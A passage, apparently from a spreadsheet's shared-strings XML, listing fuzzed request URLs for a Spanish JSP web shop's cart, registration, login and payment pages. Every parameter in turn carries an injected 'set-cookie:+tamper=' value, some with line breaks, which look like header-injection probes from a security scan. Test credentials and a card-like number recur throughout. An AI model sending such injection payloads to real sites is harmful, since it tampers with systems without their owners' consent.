set-cookie:+tamper=5532201756990587338&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=any?</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=anyset-cookie:+tamper=5230754489916261670&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=any?set-cookie:+tamper=5230754489916261670&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=anyset-cookie:+tamper=5532201756990587338&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=any?set-cookie:+tamper=5532201756990587338&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=any
set-cookie:+tamper=5532201756990587338
&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=any?
set-cookie:+tamper=5532201756990587338
&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=set-cookie:+tamper=5230754489916261670&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=any</t>
  </si>
  <si>
    <t>set-cookie:+tamper=5230754489916261670&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=set-cookie:+tamper=5532201756990587338&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=any?set-cookie:+tamper=5230754489916261670&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=any?
set-cookie:+tamper=5532201756990587338&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=any?</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=anyset-cookie:+tamper=5532201756990587338&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=set-cookie:+tamper=5230754489916261670&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=any?set-cookie:+tamper=5532201756990587338&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=any</t>
  </si>
  <si>
    <t>set-cookie:+tamper=5230754489916261670&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=any
set-cookie:+tamper=5532201756990587338
&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=any?</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=any?
set-cookie:+tamper=5532201756990587338
&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=anyset-cookie:+tamper=5230754489916261670&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=set-cookie:+tamper=5532201756990587338&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=any?
set-cookie:+tamper=5532201756990587338&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=anyset-cookie:+tamper=5532201756990587338&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=set-cookie:+tamper=5230754489916261670</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=any?set-cookie:+tamper=5532201756990587338&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=any</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=any?</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=any
set-cookie:+tamper=5532201756990587338
&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=any?
set-cookie:+tamper=5532201756990587338
&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=anyset-cookie:+tamper=5230754489916261670</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=any?set-cookie:+tamper=5230754489916261670</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=set-cookie:+tamper=5532201756990587338&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=any</t>
  </si>
  <si>
    <t>set-cookie:+tamper=5532201756990587338&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=any?</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=anyset-cookie:+tamper=5532201756990587338&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=any?set-cookie:+tamper=5532201756990587338&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=set-cookie:+tamper=8649322283211497992&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>set-cookie:+tamper=5532201756990587338</t>
  </si>
  <si>
    <t>&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=set-cookie:+tamper=5532201756990587338&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=any
set-cookie:+tamper=5532201756990587338&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=any</t>
  </si>
  <si>
    <t>set-cookie:+tamper=8649322283211497992&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=any?
set-cookie:+tamper=5532201756990587338&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=any?</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=anyset-cookie:+tamper=5532201756990587338&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=anyset-cookie:+tamper=8649322283211497992&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=any?set-cookie:+tamper=5532201756990587338&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=any?set-cookie:+tamper=8649322283211497992&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=any
set-cookie:+tamper=5532201756990587338
&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>set-cookie:+tamper=8649322283211497992</t>
  </si>
  <si>
    <t>&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=any?
set-cookie:+tamper=5532201756990587338
&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=set-cookie:+tamper=8649322283211497992&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=set-cookie:+tamper=5532201756990587338&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=any
set-cookie:+tamper=5532201756990587338&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=any</t>
  </si>
  <si>
    <t>set-cookie:+tamper=8649322283211497992&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=any?
set-cookie:+tamper=5532201756990587338&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=any?</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=anyset-cookie:+tamper=5532201756990587338&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=anyset-cookie:+tamper=8649322283211497992&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=any?set-cookie:+tamper=5532201756990587338&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=any?set-cookie:+tamper=8649322283211497992&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=any
set-cookie:+tamper=5532201756990587338
&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=any?
set-cookie:+tamper=5532201756990587338
&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=set-cookie:+tamper=5532201756990587338&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=any
set-cookie:+tamper=5532201756990587338&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=set-cookie:+tamper=8649322283211497992</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=any?
set-cookie:+tamper=5532201756990587338&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=any</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=anyset-cookie:+tamper=5532201756990587338&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=any?</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=any?set-cookie:+tamper=5532201756990587338&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=anyset-cookie:+tamper=8649322283211497992</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=any
set-cookie:+tamper=5532201756990587338
&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=any?set-cookie:+tamper=8649322283211497992</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=any?
set-cookie:+tamper=5532201756990587338
&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=set-cookie:+tamper=5532201756990587338&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=set-cookie:+tamper=9089446027174667254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any
set-cookie:+tamper=5532201756990587338&amp;b1=confirmar</t>
  </si>
  <si>
    <t>set-cookie:+tamper=9089446027174667254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any?
set-cookie:+tamper=5532201756990587338&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=anyset-cookie:+tamper=5532201756990587338&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=anyset-cookie:+tamper=9089446027174667254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any?set-cookie:+tamper=5532201756990587338&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=any?set-cookie:+tamper=9089446027174667254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any
set-cookie:+tamper=5532201756990587338
&amp;b1=confirmar</t>
  </si>
  <si>
    <t>set-cookie:+tamper=9089446027174667254</t>
  </si>
  <si>
    <t>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any?
set-cookie:+tamper=5532201756990587338
&amp;b1=confirm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set-cookie:+tamper=5532201756990587338</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=set-cookie:+tamper=9089446027174667254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any
set-cookie:+tamper=5532201756990587338</t>
  </si>
  <si>
    <t>set-cookie:+tamper=9089446027174667254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any?
set-cookie:+tamper=5532201756990587338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anyset-cookie:+tamper=5532201756990587338</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=anyset-cookie:+tamper=9089446027174667254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any?set-cookie:+tamper=5532201756990587338</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=any?set-cookie:+tamper=9089446027174667254&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t xml:space="preserve">/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=any
set-cookie:+tamper=5532201756990587338
</t>
  </si>
  <si>
    <t>&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t xml:space="preserve">/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=any?
set-cookie:+tamper=5532201756990587338
</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=set-cookie:+tamper=175083876973395307&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=set-cookie:+tamper=9089446027174667254&amp;b1=entrar</t>
  </si>
  <si>
    <t>set-cookie:+tamper=175083876973395307&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=any</t>
  </si>
  <si>
    <t>set-cookie:+tamper=9089446027174667254&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=any?</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=anyset-cookie:+tamper=175083876973395307&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=anyset-cookie:+tamper=9089446027174667254&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=any?set-cookie:+tamper=175083876973395307&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=any?set-cookie:+tamper=9089446027174667254&amp;b1=entrar</t>
  </si>
  <si>
    <t>set-cookie:+tamper=175083876973395307</t>
  </si>
  <si>
    <t>&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=set-cookie:+tamper=175083876973395307&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=set-cookie:+tamper=9089446027174667254</t>
  </si>
  <si>
    <t>set-cookie:+tamper=175083876973395307&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=any</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=any?</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=anyset-cookie:+tamper=175083876973395307&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=anyset-cookie:+tamper=9089446027174667254</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=any?set-cookie:+tamper=175083876973395307&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=any?set-cookie:+tamper=9089446027174667254</t>
  </si>
  <si>
    <t>&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=set-cookie:+tamper=175083876973395307&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>set-cookie:+tamper=175083876973395307&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=set-cookie:+tamper=7415145398045557783&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
